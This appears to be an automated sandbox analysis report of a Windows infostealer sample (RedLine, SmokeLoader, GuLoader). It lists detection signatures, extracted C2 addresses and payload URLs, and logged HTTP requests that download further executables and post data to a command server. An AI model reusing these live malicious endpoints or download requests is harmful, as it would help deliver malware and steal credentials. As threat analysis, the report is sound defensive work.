Windows Analysis Report fw8ex1BNek.exe

Overview

General Information

Sample Name: fw8ex1BNek.exe
Analysis ID: 542025
MD5: 6a4b078a500c92ae7bbf3563a49fb100
SHA1: 03005f11d47b9ef868df361c1603f33a9cee55fd
SHA256: a5acef0be0bd9993e756bb20a6b4e9fc2b1e819a02992255e4839d217ecf7258
Tags: exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

GuLoader RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://45.9.20.240:7769/Igno.exe Avira URL Cloud: Label: malware
Source: http://185.112.83.8/install3.exe Avira URL Cloud: Label: malware
Source: http://galala.ru/upload/ Avira URL Cloud: Label: malware
Source: http://witra.ru/upload/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp Malware Configuration Extractor: RedLine {"C2 url": "45.9.20.240:46257"}
Source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}
Source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}
Multi AV Scanner detection for submitted file
Source: fw8ex1BNek.exe Virustotal: Detection: 39% Perma Link
Source: fw8ex1BNek.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for domain / URL
Source: rcacademy.at Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Local\Temp\DB56.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\acgvitw ReversingLabs: Detection: 37%
Machine Learning detection for sample
Source: fw8ex1BNek.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\acgvitw Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4924.exe Joe Sandbox ML: detected

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4924.exe Unpacked PE file: 23.2.4924.exe.400000.0.unpack
Uses 32bit PE files
Source: fw8ex1BNek.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\fw8ex1BNek.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2
Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe Domain query: www.bastinscustomfab.com
Source: C:\Windows\explorer.exe Domain query: rcacademy.at
Source: C:\Windows\explorer.exe Domain query: bastinscustomfab.com
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 7769
Source: unknown Network traffic detected: HTTP traffic on port 7769 -> 49850
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.112.83.8/InjectHollowing.bin
Source: Malware configuration extractor URLs: http://rcacademy.at/upload/
Source: Malware configuration extractor URLs: http://e-lanpengeonline.com/upload/
Source: Malware configuration extractor URLs: http://vjcmvz.cn/upload/
Source: Malware configuration extractor URLs: http://galala.ru/upload/
Source: Malware configuration extractor URLs: http://witra.ru/upload/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 17 Dec 2021 07:07:38 GMTAccept-Ranges: bytesETag: "8d927cc614f3d71:0"Server: Microsoft-IIS/10.0Date: Sat, 18 Dec 2021 14:32:43 GMTContent-Length: 94424Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 a6 2f 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 48 0e 00 00 00 00 00 00 00 00 00 00 88 5c 01 00 50 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 48 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
Source: global traffic HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbhfij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uexckctm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydnswljr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyedgkcsgg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rydxhqucb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwbia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwahbovc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvqqrvitjv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pawqkjnqlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbely.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfquy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svlbtjow.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrenwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kliyespolk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hjmjrvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvgdwnrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqvtkcroe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wayrnqsako.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayamwyb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gffroy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysuckj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmchuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tnsiunfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydbdqcx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myjlsdvf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfeippj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgwuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvxkwka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: rcacademy.at
Source: global traffic HTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbswig.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmxlxoqtyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwwgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwrqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hetky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wadndxm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whrkpnnn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udjjtqdogg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyvwwwlnbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwrfdbfbaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: rcacademy.at
Source: global traffic HTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvyrwnlgbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbwucidikt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwmsuk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkybqrxqpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaqwoemuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyexyommxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jawmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xefimpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
Source: global traffic HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dppsna.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: rcacademy.at
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.9.20.240 45.9.20.240
Source: Joe Sandbox View IP Address: 190.117.75.91 190.117.75.91
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49850 -> 45.9.20.240:7769
Source: global traffic TCP traffic: 192.168.2.6:49865 -> 86.107.197.138:38133
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 8CE5.exe.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 8CE5.exe.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 8CE5.exe.5.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
